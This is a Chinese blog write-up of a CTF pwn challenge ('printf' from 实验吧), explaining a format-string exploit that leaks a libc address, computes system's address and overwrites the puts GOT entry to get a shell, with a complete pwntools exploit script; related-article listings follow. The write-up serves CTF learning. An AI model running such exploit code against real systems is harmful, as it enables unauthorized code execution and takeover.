CTF-PWN-printf(实验吧|格式化字符漏洞)

最新推荐文章于 2024-08-04 22:46:45 发布
最新推荐文章于 2024-08-04 22:46:45 发布
阅读量3.2k 收藏 3
点赞数
分类专栏: CTF-PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/getsum/article/details/86739498
版权

首先运行文件,发现需要输入name,于是打开ida逆向出正确的name,来到了程序主界面。

首先我们先逐一判断函数的用途。put_file是让我们输入文本名称和内容,get_file是让我们输入文本名称,然后程序输出文本内容。show_dir是按照先来后出输出所有的文本名称,并且无缝衔接。

这个时候我们发现get_file函数中显然有一个格式化字符漏洞。

这种漏洞会导致我们可以控制任意内存的读写,因此我们考虑由此下手,构造system(/bin/sh)拿到shell

由于show_dir为反向输出,并且中间没有分隔符号,所以我们对输入的文件名下手,构造/bin/sh,那么自然,我们就可以劫持puts函数为system函数

然而程序本身没有system函数的入口,所以我们要找到一种办法将GOT中system函数的地址覆盖到puts函数中

在Linux终端,通过输入:

readelf -r pwn

我们可以查看到puts在运行的时候实际地址被存放到的地址

所以我们下一步就是找到system的实际地址,然后利用格式化字符漏洞,将其写入0x804a028中 

 这里参考了一下leehaming的博客https://blog.csdn.net/lee_ham/article/details/82556622,利用以下公式,可以算出system在运行时的实际地址

libc_base = __libc_start_main_addr - __libc_start_main_offset

system_addr = libc_base + system_offset

用gdb-peda在printf函数处下断点,检查栈。(命令为 stack 100)

 

我们发现了__libc_start_main+247为0xffffd03c,又因为栈顶位置与0xffffd03c距离为364,364/4=91,所以我们可以直接输入%91$x来表示,于是__libc_start_main就可以求出来了

通过libc-database可以知道system函数相关的偏移值,然后system函数的地址我们也可以求出

接下来就是将地址写入puts的临时地址位置中。

为了加快速度,我们可以考虑将system的地址(假设为0xaabbccdd)分成两部分,低地址放进 0x804a028,高地址放进0x804a02a。

构造payload

payload1 = p32(puts_got_addr) + '%%%dc' % ((system_addr & 0xffff)-4) + '%7$hn'
payload2 = p32(puts_got_addr+2) + '%%%dc' % ((system_addr>>16 & 0xffff)-4) + '%7$hn'
之所以是%7$hn,是因为我们在程序停止于printf函数时,打印栈发现我们需要改变的地方的偏移量为7。

exp程序:

from pwn import *
context.log_level = 'debug'

#prog = remote('106.2.25.7',8001)
prog=process("./pwn")

def putfile( prog , filename , content ) :
   print 'putting ' , content 
   prog.sendline('put')
   prog.recvuntil(':')
   prog.sendline(filename)
   prog.recvuntil(':')
   prog.sendline(content)
   prog.recvuntil('ftp>')
def getfile(prog , filename ) :
   prog.sendline('get')
   prog.recvuntil(':')
   prog.sendline(filename)
   return prog.recv(2048)

prog.recv(2048)
prog.sendline('rxraclhm')
prog.recv(2048)
putfile(prog,'sh;','%91$x')
res = getfile( prog , 'sh;')
print res
mainadd = int(res[:8], 16)-247
sysadd = mainadd - 0x18540 + 0x3ada0 
print 'system addr ' , hex(sysadd)
putsadd = 0x0804a028

payload1 = p32(putsadd) + '%%%dc' % ((sysadd & 0xffff)-4) + '%7$hn'
putfile(prog , 'in/' , payload1)
getfile(prog , 'in/')
prog.recvuntil('ftp>')

payload2 = p32(putsadd+2) + '%%%dc' % ((sysadd>>16 & 0xffff)-4) + '%7$hn'
putfile(prog, '/b' , payload2)
getfile(prog,'/b')
prog.recvuntil('ftp>')
prog.sendline('dir')
prog.interactive()

 

SuperGate
关注
专栏目录
BugkuCTF-PWNpwn6-printf超详细讲解(未提供Libc版本)
am_03的博客
08-31 1140
查看文件类型: 查看保护机制: IDA64位打开: 伪码: 查看子程序: case 2: case 3: case 1:
CTF pwn题之格式化字符漏洞详解
热门推荐
lifanxin的博客
03-22 1万+
FmtStr格式化字符串类概念求偏移和任意地址写求偏移任意地址写一个例子程序分析漏洞利用wp总结 概念 在遇到pwn题中格式化字符漏洞时,我们一般会分两大步实现漏洞利用:首先构造一个payload来寻找输入字符串到栈顶指针的偏移,然后利用偏移实现对目标地址的改写。下面我将介绍pwntools中的FmtStr类如何实现偏移的求解以及对目标地址的改写。 求偏移和任意地址写 求偏移 在格式化字符漏洞利用中,我们一般都是这样手动构造payload进行偏移求解的,如下图所示,开头输入方便定位的字符串aaaa,然后
Pwnprintf漏洞
weixin_52553215的博客
03-10 1136
参考:https://bbs.pediy.com/thread-250858.htm Format String 介绍 1 printf("Team Name: %s\tPoints: %d\n", "Whitzard", 999); 在上面这行语句中, "Team Name: %s\tPoints: %d\n"为格式化字符串(即printf第一个参数),"Whitzard"、999分别为第二个和第三个参数。在格式化字符串解析时,格式化字符串中的 "%s" 对应
[CTF]-PWN格式化字符漏洞题综合解析
最新发布
2301_79326813的博客
08-04 1099
格式化字符漏洞,可以修改printf的got表内地址为system,传参getshell解法一:在32位中可以使用fmtstr_payload直接修改,免去很多麻烦这个没啥好讲的,只是这个函数64位几乎用不了。解法二:在这个方法中没有使用fmtstr_payload函数,虽然麻烦一点,但必须掌握。先回顾一下知识点在32位中,libc函数的真实地址共有32位(8位一个字节),其中前8位对于所有libc函数来说都是相同的,后24位不同。
pwn入门笔记(3)——printf漏洞调试
weixin_45551695的博客
07-28 572
printf 在C语言中,我们经常使用各种函数来进行输出操作 printf,fprintf,vprintf,vfprintf,sprint等, 其中Fomat String是其第一个参数,我们一般称之为格式化字符printf 接受变长的参数,其中第一个参数为格式化字符串,后面的参数在实际运行时将与格式化字符串中特定格式的子字符串进行对应,将格式化字符串中的特定子串,解析为相应的参数值。 解析 我们都知道printf在执行的时候,首先进行格式化字符串的解析,,从栈或者寄存器中获取参数并与符号说明相匹配,然
pwn做题笔记14-echo_back(printf函数栈详细利用+利用控制scanfIO流实现任意地址写入)
qq_40923256的博客
08-28 457
当Linux新建一个进程时,会自动创建3个文件描述符0、1和2,分别对应标准输入、标准输出和错误输出。C库中创建与文件描述符对应的是文件指针scanf读取stdin时依照读文件的方法,内部调用_IO_new_file_underflow函数。而该函数最终调用了_IO_SYSREAD系统调用来读取文件。在调用系统函数前,该函数同时进行了判断处理:根据读取指针的位置和结束位置来判断缓冲区中是否还有可读取的数据。
[PWN][基础篇]printf漏洞介绍
网络安全知识分享
03-20 5147
printf漏洞介绍1、概念2、漏洞成因 1、概念 printf接受变长的参数,其中第一个参数为格式化字符串,后面的参数在实际运行时将与格式化字符串中特定的子字符串进行对应,将格式化字符串中的特定字串,解析为相应的参与值。格式化字符串就是%这种。 2、漏洞成因 printf函数在执行时,首先进行格式化字符串的解析–从栈(或者寄存器)获取参数并与符号说明进行匹配,然后将匹配的结果输出到屏幕上,那么 ,如果格式化字符串中的符号声明与栈上参数不能正确匹配,比如参数个数少于符号声明个数时,就会造成泄漏。 而本书,p
BUUCTF-PWN刷题记录-18(格式化字符漏洞
weixin_44145820的博客
05-08 1775
目录xman_2019_format(字符串位于堆上)hitcontraining_playfmt(字符串位于bss)wustctf2020_babyfmt xman_2019_format(字符串位于堆上) 一道格式化字符串题目,但是只有一次输入机会,但是有多次利用机会,每次利用使用‘|’隔开 我们先看一下栈的情况 经过多次调试,可以发现返回地址最低一个16进制位一定为0xC,我们只需要爆破倒数第二个16进制位就能得到指向返回地址的栈上地址 Exp: from pwn import * #r =
跟着CTF-Wiki学pwn|格式化字符串(1)
Kni9hT's Blog
05-19 2221
文章目录格式化字符漏洞原理介绍格式化字符串函数介绍格式化字符串函数格式化字符串参数格式化字符漏洞原理格式化字符漏洞利用程序崩溃泄露内存泄露栈内存获取栈变量数值获取栈变量对应字符串泄露任意地址内存覆盖内存覆盖栈内存确定覆盖地址确定相对偏移进行覆盖覆盖任意地址内存覆盖小数字覆盖大数字 格式化字符漏洞原理介绍 首先,对格式化字符漏洞的原理进行简单介绍。 格式化字符串函数介绍 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计
BugkuCTF-PWNpwn7-repeater详细讲解多解法
am_03的博客
08-31 4217
知识点 解题流程 方法一 查看文件类型: 32位文件 查看保护机制 只开启了NX 32位IDA打开 伪码: 0x70=112 0x64=100 发现该题目为典型的格式字符漏洞。 解题思路 此题的大概思路如下: 1、找到libc_start_main在栈内的偏移,使用%p暴露该地址 2、利用LibcSearcher猜测使用的libc,算出libc基址 3、计算出此libc的system地址 4、把prinf的got表改为system地址 5、执行system(’/bin/sh’) 具体调试 执行gd
pwn学习资料整理——x64中的printf回显漏洞
recover517的博客
08-04 391
利用printf打印栈中内容 B站上有讲解有关printf回显栈数据的课程,但都是以x86为例,这次做题遇到x64架构下的相关漏洞,故做本次记录。 IDA伪代码 int __cdecl main(int argc, const char **argv, const char **envp) { char v4[32]; // [rsp+0h] [rbp-30h] BYREF char buf[16]; // [rsp+20h] [rbp-10h] BYREF setvbuf(stdin, 0L
ppm编解码器,ppm解码板,Verilog
09-10
进行ppm编解码的verilog代码,RTL描述
利用printf调用malloc getshell&&0ctf2017_easiestprintf
azraelxuemo的博客
04-03 1086
文章目录0ctf2017_easiestprintf题目分析保护源码do_readleave攻击泄露libc如何劫持控制流printf源码分析小结开始利用__free_hook替换成gadget__malloc_hook换成one_gagdet最后一种解法 首先题目名字严重…漏洞看上去很简单,但真的好难 0ctf2017_easiestprintf 0ctf2017_easiestprintf 题目分析 最难的题目往往代码很简单 保护 RELRO 全开,也就是不能修改fini,init,got表来劫持控制流
hctf[pwn]babyprintf_ver2
九层台
11-15 820
0x01程序分析 程序给出了data段的地址,然后允许向这个地址处输入0x1ff个字节。 这个data段到底存的是什么呢? pwndbg> print $rbx + $rax $1 = 0x555555756011 pwndbg> x /50xg 0x555555756011 0x555555756011: 0x7200676664647364 0x200000000000646c ...
[pwn]关于printf输出时机的坑
Breeze的博客
08-26 8347
关于printf输出时机的坑 今天遇到了一个特别有意思的题,本来很简单的利用,但一直没有算出来,最后发现是一个很简单的却很细节的问题。 welpwn详细writeup 题目地址:welpwn 首先查看一下安全策略: 保护很少,然后看一下代码逻辑: read读入了0x400个字节,一般这么长必有溢出,注意echo并不是系统函数,查看echo逻辑: s2只有16个字节,但却复制了一个0x400字...
[PWN][基础篇]如何利用printf漏洞突破canary保护
网络安全知识分享
03-21 4042
如何利用printf漏洞突破canary保护 使用的实例代码如下 为了配合本次实例的教学,大家在编译时,不加pie保护,加cannary保护,整个的流程就是,分析程序之后,编写exp,利用printf漏洞(填充func函数,使其返回地址为exploit函数)来突破canary并且覆盖ret。 之后使用gdb开文件,查看func函数 来自英语白痴的小tip: 我们可以大概搞清楚func的流程,就是先read,然后printf,然后read,就是这样子。 我们下断就下到printf这里,我输入的测试用例是
CTF PWN 格式化字符
VisualNull的博客
06-05 1226
CTF PWN格式化字符
buuctf 强制转换无符号数溢出 任意地址读、跳转 _printf_chk free_hook jmpesp scanf输入过长触发malloc
carol2358的博客
08-06 1218
文章目录zctf2016_note2 zctf2016_note2 本题的漏洞在这里 有符号数和无符号数进行了比较,转换为无符号数, 我们把size设为0,那-1就永远大于i,就可以溢出了 本题可以改got表,heap_ptr的地址也可以找到,那就unlink 改成这样就行,利用chunk1的溢出 然后改atoi为system, 输入sh就行了 exp: from pwn import * from LibcSearcher import * local_file = './note2' loca
PHP反序列化漏洞利用:0CTF-2016 piapiapia案例
在2016年的0CTF比赛中,题目“php反序列化长度变化尾部字符串逃逸”挑战了参赛者对PHP安全的理解。该题目涉及到了一个登录界面,展示了如何利用序列化漏洞进行攻击。在这个场景中,开发者的代码包含了一个简单的登录...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值